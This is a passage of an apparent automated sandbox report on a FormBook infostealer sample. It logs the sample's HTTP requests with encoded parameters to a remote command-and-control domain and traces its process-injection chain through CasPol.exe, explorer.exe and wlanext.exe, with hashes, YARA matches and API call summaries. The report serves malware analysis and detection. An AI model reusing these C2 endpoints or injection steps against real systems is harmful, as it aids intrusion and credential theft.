Mkn=1ZNm~q7dG2WPy3dQbhk-opB803S9NnvKeeXNUWSsP65PoBkFUuGnkDEp~4zkm4~LXD91qMS6ro5Q1a0y6oY8EN~d89Re53h0pkXcqM(Pn8J_5bpzHt8U4lq6yPq5n34qtux5MG0SVuYuvZ9udzp920J8iAVKOywn8G4N7lpBYlI73Q5ue02sAD6sQUUIVQKmxh7kio8NS1NHBR2hqRgyzq11LeVw14jo4a5kZaChbuTLl0FcLF5UxWccCKvGybqLOPfH8Qo6USw1fxO-yG93J1nXhsSL1aufDK5EBh(-lPwQ3jgcqckQXnGX9PFYzIKv7VStHM4kLaRysVeKyJrd2mfuYm5uVHjNFrlC8FEI9gwAXOOwJom3BihZBjJAXMmbcRD7xI1WGIdNa66QvhsXa-VZf_rr3OkIY4gJtA0L1OI3baB0xx8JHtLusLp_vfADlCyjGpjmxHzz~Z83KmnJIkKbi7FQteZvDwZGIJq4qpBlWmQI(Vt-m3vTxZhPvcHNzLwiWmG6MSmZk6o6nHhs61sJsp8kZ_LB7ySSLe1CodtBkb2OAQBWJ7(JVYRgBGI4irwzYvCf8Wle4WRftMuTNxzYUCWMdRoHwJwxn3v1V6zIUHAUjbJM6wHqE43XmaFVKFkLg9fs~oP8jIVz6FSQw6X-Ix1FvbDUh7WoGEZWO2GT7KhwsG0mGgFwJ0jN0akT3lYQDgaQbXENuArO4BEUiN7ONnirfNFkoAygjLEx(DvsW_oaIQsQ2IAGOYKwPrPRNF3ssfRKW6Dr9K~Iatnw2ivl5N6HVV9vxQPFZLEzlnF_(3k2KSQuhf8cbS3r1up2tu8cgoPH0ftDMMDtHAcKrnIe(MiD~dQJV6wDWKoKiyzFbalk2QoeLtTcWZfeLgwUocG7BjqB89GSodh1qXEylkq42HOGhuklyiPT3xb4lVV9RvPg4WuBoZCd4LPwnrGOwd9z65kzzF(974Hi8SlsCmwtl99aDh43MIA-L4hFt2jiPPOIJ8hq6WI1Hj(GIJ6i8_6AObzuBp(kYsdPi7CzBN4BdDI0klpgTMDSl_BQP7g_MKF34FxLNWOul0Scm5ebMa6p7wmLswEmyenNmZFKW5tzlyINDdfuqVcdoKrIwfmXdeugx2gZ6Z~rC8LIk0G6~4OO(OzKR3wcBOTCit56X7mfgd~cNIYi0gnvTddrlNCK1z3cgmdDiW6t7i0IJxt9KZENbJaBsM3uYdD8ncncpqt92g3XyoQl3lEdW8oCAJKlj5L79G0A9XElet0TU6Ug1FwXHQQKt_UAprRVsNKSKyVUmfYpvlgFr9Jq1V9JjNLuEbD2y3gDJuzMHTxiLU1fvZd46OQZVSzXo4HehEZ6Lhi-ii5-mAgc~gvFZltk2jTIHPS6rHhby6TpInjJO8OW8rCzx5GKKjAFsgmTEazl(IW2laKIwfID7L4W1FDpj-NCjjwXIWL0z9OkNF0By9Atq52aee0R0-4asK6pWWs2OFqXFAqU7ptV6Z(13H(CIBO7Yq2lnuiM8A4Y16MmeS~paLfF18skgzOXkePmuNlHNVa7MXy255fCm_6nPXdHyTE6YdQopKa7BWYk1XLcQFZKns4U0VbJwA9n5bsS~TxqxxI1cRA-vRletA2oXzuGz7DxLC230IXE2HDVtvj-j5XijbrzfI2W5165qh0MdAh9NJ86lPfHu_KviHMWYt~u9GF8NEDxchFRnwOkmPqH9vL_(DfGUS2IbPUjSbOljDjnr-sqGmbV9MUf~w72vjLRLpzmaah6tTBFSraRH-LHUxPG5E(eJ2JipfXw2vryxZiNoH5SGLWCGpgFjiuCi_pR0TQirSZfn9OFHd8zLvxTKEOOzF3PlBQEKqpvYBoTo2fcZOmks5M3Re5uolhPb9QnumEFhBQZKWZgmPiaYyqH(l(PpxwW4VxQ(CFG0F0k4zzypQ1dbaeNCOq0B2blqA3h5cI6LJqgPlY5zfWMIPnkk2XQ56eKKQnz45ngD10_(IBFpT2TF-1E~3xJdjMgwf88L90Bas0tkjamNcbF4HyVxaxHOv~75OWAKDfyuR(CL6i_UwVz5CWWbBDVkhEP1v~fnzsDUu0L3JsKyAIib8KcULFecio1qdnJOj4Ss8M5YTomS215ZyEYzwPk(MkyDiM3KJgvlYnhpyC2A3UhQg9Y(MevQ6Ixrkh61qeLvtJneEA1h71NOWdVlfCuEs5O1QoEMj48JJDB5f3VuPzsG_6a8Xxqono3tBWVzk1hmEfvAuYI9s74DTPlGsu6nkHd9WD6Tr6k~6(XzN2yRb1ZvcgrVIWQEYoUwvJhTITGeugwrYdMfGS-ruo3s75xg8SNBtVzXgJyfY5KATW-f9y9B-JYZwV0oIVlmz65FdsZyaxm7kKVUd7IIyGQwwUrf9x2bfVdaGfGD0iZ20GfUwWWIZFEOUL4~6Wxd8Kchu3PSLB-8cPj3a(6uFQ9jbQL4d4ORgT0BXT_G8lxbOaN4iikMD1Xe4ssiSVd5Uw25IawMdVsHOb94nFwfrhLhicdtHmvarRV0xwhdk1kuv7YNITorkXUSoYcEPjK8j4SwDLcRNY_k3PCyHAgA6241g6wNuQCjIv6sz35z6Vfh52jnre5xJGhTyAd4k(largsBvZ2lJ7EtlwyGPOLmuMKr40Jz7XPK1HW~qL4Pfv7ARREH0wVMNnlFp0o~FSePmBmnmeQeVh7ymucn2A_XFm9zshBYZyP4qM6dJJY4v8H4QWI5Hy1t7HHcKp-z5kmGmqTgXAB8B3cPdEcpkje4m(OIuhMXr8VpNWi~uCvzvi_B-iO01sf7um4aPY5yPY2jHIVM-7nyy6e7DD7A9RxOX5HtG038a6hsy0dH8nLbgC8ZWAQ0G2K3FY17UIGagi4AsJvyWa8k4LbTsjGzdicLYiFhnbuqL~CY1RrLtcuKlZHQ7d3EiTN2HZgmuF9vGi8o7UfxTZEHDQ688Rppks5XKynFPqvz5bw5K71(HB0tO0WZiElo03HlQbkoZdBIP1lcIT3onzpsXESaysVAe28RpU0Dybihs6yaSZ3RmN4cuW69E3ubcdur1eU2OOFxylwZRvuKep1MdeZKFLII-~88SxzczVUP1h2xeG8CjNfcvRptMwWSQTyppGIMeGyRL97TMH5vk5p98CTyoCZupBtqB8v8uIt0iijrrnAgSkLbNvSBnjhaibg~ahqDk998ZmK(pyVDyD76G6jDpZvzqtvmAw04NrqmjtwOvDx3p3n6Y74QWJlYh(hSUouP-0ih8i9dbBhBWTy7wvddq5agsZf8GIN1srBoSwMFvydtYrTCweqY-X847033miX~is28apwPOTax2bRiqWS3GrOiuwW1PqQEzI-0YU6j6Gk48gtXlSpB4NOdVuyWn81agHBt6ao3kPHyV79HTTuqEbeUtWLUOFzBzs0lys2ZtD3WA8jwTTBHZQbtKSZY2uqTXVVj0ZFDJfoIlEN6L94ngaqnUcVFARW1qmJddAhqOwZtVr5pzKScnQGIYqpJQN73_(Y5cjEKZLuI0uCr1rNok4iNgeKBZntASb-qbBvYpRD(qSOV3z6kvUNFHfCgrpgF23V~5cuXyhKTG~mqkrcXSvZm0oi(y28J7YlCBVb(Z7qquX5xY8kQq~OdVALYIrDfs9fE4g9(tVCMYqjMniloFwzUXPwBCgX3gCbuwQ-RE6168aJABSMDd8uNn7K3SQqwlNNkhGuJK0JwR1iMIRnXIbib0JLZsu1oSERHqTbCJpFffDxlBekxR2eDoa4HhjC80b03J2YgQADvzTsOFA6qaCAYMSpmf2jr3MjRt8ahxpHoriXXInycoaqbcwfk_ir2PpjW_pbD-QrMUotsmqjkpkFe_9e533q5aD1BjtTIbHi8BBhrHvTbCp1Ciuh~TWfA2rplNFoL3pE54uPyRC9DWjwHFN2cLhV~BLHSAdwJaQnaU49AEcUy5KJHd~b51CfVBj5mhjqotQmtDY36Ot_cEitTdv3VhiADF9R3rKOgqPNcke4chgbxfaq022AHIZgbVYLtkgB7Dd2pwk1bJja3ir7m1Yr14G4PhCZ4ps_WjKIARntMVlfDN
Jan 25, 2023 13:22:21.927761078 CET	178	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 25 Jan 2023 12:22:21 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.tf8dangky.online/crhz/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49710	18.138.206.213	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:24.450882912 CET	179	OUT	GET /crhz/?Mkn=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEmRdiQ98V40n9u5A==&vux=DmStydFUWc8HD HTTP/1.1 Host: www.tf8dangky.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 25, 2023 13:22:24.653743029 CET	179	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 25 Jan 2023 12:22:24 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.tf8dangky.online/crhz/?Mkn=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEmRdiQ98V40n9u5A==&vux=DmStydFUWc8HD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 908, Parent PID: 3452

General

Target ID:	0
Start time:	13:21:07
Start date:	25/01/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xb20000
File size:	288768 bytes
MD5 hash:	58B8732ED17532B518BD90B68B934B23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 240, Parent PID: 908

General

Target ID:	1
Start time:	13:21:08
Start date:	25/01/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
Imagebase:	0xb90000
File size:	107624 bytes
MD5 hash:	F866FC1C2E928779C7119353C3091F0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 240

General

Target ID:	2
Start time:	13:21:10
Start date:	25/01/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: wlanext.exePID: 5544, Parent PID: 3452

General

Target ID:	10
Start time:	13:21:28
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wlanext.exe
Imagebase:	0x13b0000
File size:	78848 bytes
MD5 hash:	CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 908, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	38.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.1%
Total number of Nodes:	98
Total number of Limit Nodes:	2

Executed Functions

Function 02DF4910 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02DF499E

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 6dde440fc14b1e2b0f82b17bc565fdbd93ba3600f547f10dc15d0a016bab5f5d
Instruction ID: 5ee69757f18f88488b6a9c43a7defca941b4fa0ae619edef4f13c68f895b47a2
Opcode Fuzzy Hash: 6dde440fc14b1e2b0f82b17bc565fdbd93ba3600f547f10dc15d0a016bab5f5d
Instruction Fuzzy Hash: 6B31A9B9E012189FCB10CFAAD980A9EFBF5BF48314F14942AE914B7300C775A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DF5470 Relevance: 1.0, Instructions: 970COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b12327718552e74f593e2f8aed3b2a37b7cd5fdea79cc280657994d3b1821c7c
Instruction ID: 96c3c381093548ee0b8c2e5b3bf0bcb4110ba34a26f5eed0eaf22584325526a2
Opcode Fuzzy Hash: b12327718552e74f593e2f8aed3b2a37b7cd5fdea79cc280657994d3b1821c7c
Instruction Fuzzy Hash: BCA2A274E012298FDBA5EF29D984BDEB7B6EB48300F1181E9960DA7350DB349E84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02DF2971 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d439d423fab7cf809e6c6ee7740a219f0aec9bc6e696163cecb56936b81ee5e
Instruction ID: 4971830ed322baa098516051b0846d8fae2ec67185ec80b938fc36e12f0a0b16
Opcode Fuzzy Hash: 0d439d423fab7cf809e6c6ee7740a219f0aec9bc6e696163cecb56936b81ee5e
Instruction Fuzzy Hash: FF52A574A002198FDB64CF69D994B99BBF1FF49300F1591EAE909A73A5DB309E84CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02DF0BA1 Relevance: .6, Instructions: 581COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80babaf624f2c240c8dcf0a3ab7a95764f2d618619e90a6ccc7187c43fdd919c
Instruction ID: 6c0d121e43f6bff78bee7a79f75f3db4668895ce7f7941be425428f62092cad9
Opcode Fuzzy Hash: 80babaf624f2c240c8dcf0a3ab7a95764f2d618619e90a6ccc7187c43fdd919c
Instruction Fuzzy Hash: C452A474A00219CFDB64CF69C994B99BBF2BF49310F1181EAE909AB365D730AD85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DF0388 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac4f425800e5b4abe25d853bd441302c14c270262a803582ed25fa0e81569653
Instruction ID: 638349b197a1842bce932c82528ca99dda00d34c54f50725beed2bf33249663b
Opcode Fuzzy Hash: ac4f425800e5b4abe25d853bd441302c14c270262a803582ed25fa0e81569653
Instruction Fuzzy Hash: F9817774E042499FCB44CFA8D890ADEBBF2FF89300F11846AC545AB3A8DA719942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DF1AE0 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2682075d7417f56326466d577a88c9c58db75d5c40f5a78c74b0b923f4432830
Instruction ID: 914bf5035e81acd161c5ae89893a1dd205e51df6decfd41d675b447f997d11ed
Opcode Fuzzy Hash: 2682075d7417f56326466d577a88c9c58db75d5c40f5a78c74b0b923f4432830
Instruction Fuzzy Hash: B8615570D05219CFCB84CFA9C4506AEBBB2FF8A304F208929C519BB344DB749A42CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02DF1ACF Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d710ab14c493b737ccd5b8463fbaf2d4af21be37c8cc8c7de984b787f1fd607
Instruction ID: 982f42313e34caa46e41debb64cab47e379d8ccc5a94fc1be2edebc5f478bb09
Opcode Fuzzy Hash: 3d710ab14c493b737ccd5b8463fbaf2d4af21be37c8cc8c7de984b787f1fd607
Instruction Fuzzy Hash: B3617A70D05209DFCB84CFA9C4506AEBBB2FF8A304F108929C55AAB354DB74CA42CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02DF0448 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a93e0ce8d1ecf0fc9f6504a3fb7812da4fee2d9d8486a464e978b92c8418329
Instruction ID: 6b4007bc9a90f0932c37ac78733c4111eb3ce65cd03092570296e6580b68eb20
Opcode Fuzzy Hash: 2a93e0ce8d1ecf0fc9f6504a3fb7812da4fee2d9d8486a464e978b92c8418329
Instruction Fuzzy Hash: D86104B4E0120DDFCB44DFA9D580AAEBBB2FF88301F108529D516AB3A8DB759941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02DF0438 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78a4213912af38adaa9c1439a88ae2eb947c8f5096ac94f9d635c24c5568d758
Instruction ID: 53f6395cd19dc8d5b31920220cf8131c5c353a2b700f7985f7c26611acff63fd
Opcode Fuzzy Hash: 78a4213912af38adaa9c1439a88ae2eb947c8f5096ac94f9d635c24c5568d758
Instruction Fuzzy Hash: 01610574E0120DDFCB44DFA9D480A9EBBB2FF88301F10846AD905AB398DB75A945CF55

Uniqueness

Uniqueness Score: -1.00%

Function 02DF4ADC Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a83c25ce36045ca799b210cc6a28cded94413848c03e48edf3955960562f2e5
Instruction ID: 1b5beab7f5e5f00d1565a7c86717014d9b831110c6abdcafefaa685e13a01b57
Opcode Fuzzy Hash: 0a83c25ce36045ca799b210cc6a28cded94413848c03e48edf3955960562f2e5
Instruction Fuzzy Hash: FF5100B4D002188FDB54CFA9D884BDEBBF2BF49304F109529E615AB390DB749845CF99

Uniqueness

Uniqueness Score: -1.00%

Function 02DF33D8 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5defd0a7593123b8eddd72724125afd503077233c233adb59f0c4e71a080af8
Instruction ID: 60e5a797dbeb06682110ecfebdd5ee800558ef47b83fd15c78119f58e0e2abd5
Opcode Fuzzy Hash: a5defd0a7593123b8eddd72724125afd503077233c233adb59f0c4e71a080af8
Instruction Fuzzy Hash: AB5100B4D002188FDB54CFA9D884B9EBBF2BF49304F10952AE915BB390DB749845CF99

Uniqueness

Uniqueness Score: -1.00%

Function 02DF66DC Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DF68C7

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a233c09eadf0336f9a5f8f9110702aeb07654c3ea89c5eb1525f0fe8988110d0
Instruction ID: 11db0ae6ef540cdeb038bd7d2e95f804305e299f303b9228b4e5d298812297db
Opcode Fuzzy Hash: a233c09eadf0336f9a5f8f9110702aeb07654c3ea89c5eb1525f0fe8988110d0
Instruction Fuzzy Hash: CE91DF75D0026D8FCB24CFA9D880BDDBBB5AF19304F0490EAE548B7260D7749A89CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02DF66E8 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DF68C7

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c26b6b5f6622dd357e8e1e9022b573c37de85db16eb43d0ef8b15dbb071b2b9b
Instruction ID: 5e2372b26f7d49612fc6e1c84c1fc5beb82b1b8e11370d38605a53e6e059bca7
Opcode Fuzzy Hash: c26b6b5f6622dd357e8e1e9022b573c37de85db16eb43d0ef8b15dbb071b2b9b
Instruction Fuzzy Hash: 9E81CF75C0026D8FCB24CFA9D880BDDBBB5AF19304F0490AAE549B7250D7749A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02DF6D98 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DF6E66

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: adb3ca5b0b37d108f00c9391c0ffa161850283298a8bdb6adb21b8dcade2c312
Instruction ID: c6ae20eafa593289589d6906a74eb9549cdd390a4b04a05aeb2e07791e435bf6
Opcode Fuzzy Hash: adb3ca5b0b37d108f00c9391c0ffa161850283298a8bdb6adb21b8dcade2c312
Instruction Fuzzy Hash: CE418AB5D002589FCB10CFA9D984ADEFBF5BB49314F24902AE914B7310D375AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DF6D93 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DF6E66

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c50eaad2c9f78b0c1a52a147cf79961018e9f337fb25c240488ce1e12fc549ae
Instruction ID: 59bdd73e476b7004a9d97509d8215269742b4c23552965b0abdb18b3b2923af7
Opcode Fuzzy Hash: c50eaad2c9f78b0c1a52a147cf79961018e9f337fb25c240488ce1e12fc549ae
Instruction Fuzzy Hash: CF419CB5D002589FCB00CFA9D984ADEFBF5BB09314F24902AE814B7310D375AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02DF6B70 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DF6C25

Memory Dump Source

